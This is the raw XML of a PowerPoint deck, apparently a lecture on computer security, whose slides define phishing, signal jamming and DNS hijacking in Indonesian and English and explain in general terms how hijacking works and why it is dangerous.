              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> situs yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>percayai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> situs yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mirip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sederhana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mengetahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kalau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>perangkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>situsnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sebenarnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="682934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err="1"/>
              <a:t>Phising</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kegiatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>memancing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pemakai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> di internet (user) agar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>diri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pemakai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (username) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sandinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (password) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>suatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> website yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> di-deface. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Phising</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>diarahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> online banking. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Isian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pemakai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> password yang vital yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dikirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>akhirnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>milik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>penjahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>belanja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kredit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rekening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>milik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>korbannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Jamming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mengacaukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sinyal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>suatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sinyal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> di-ground-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sinyal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ditangkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sekali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Jamming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>apabila</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>oleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> orang yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bertanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>misalh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>teroris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>), yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aksinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>megngakibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>suatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kota</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lumpuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>melancarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>terornya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="803128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a:t>DNS hijacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (sometimes referred to as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>DNS redirection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) is a type of malicious attack that overrides a computer’s TCP/IP settings to point it at a rogue DNS server, thereby invalidating the default DNS settings. In other words, when an attacker takes control of a computer to alter its DNS settings, so that it now points to a rogue DNS server, the process is referred to as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>DNS hijacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2275444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DNS Hijacking Works?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As mentioned before, DNS is the one that is responsible for mapping the user friendly domain names to their corresponding IP addresses. This DNS server is owned and maintained by your Internet service provider (ISP) and many other private business organizations. By default, your computer is configured to use the DNS server from the ISP. In some cases, your computer may even be using the DNS services of other reputed organizations such as Google. In this case, you are said to be safe and everything seems to work normally.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="254702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7030792" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But, imagine a situation where a hacker or a malware program gains unauthorized access to your computer and changes the DNS settings, so that your computer now uses one of the rogue DNS servers that is owned and maintained by the hacker. When this happens, the rogue DNS server may translate domain names of desirable websites (such as banks, search engines, social networking sites etc.) to IP addresses of malicious websites. As a result, when you type the URL of a website in the address bar, you may be taken to a fake website instead of the one you are intending for. Sometimes, this can put you in deep trouble!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="DNS Hijac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5975" y="2062934"/>
            <a:ext cx="4048125" cy="2809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291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Dangers of DNS Hijacking?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The dangers of DNS hijacking can vary and depend on the intention behind the attack. Many ISPs such as “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OpenDNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” and “Comcast” use DNS hijacking for introducing advertisements or collecting statistics. Even though this can cause no serious damage to the users, it is considered as a violation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>RFC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> standards for DNS responses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other dangers of DNS hijacking include the following attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
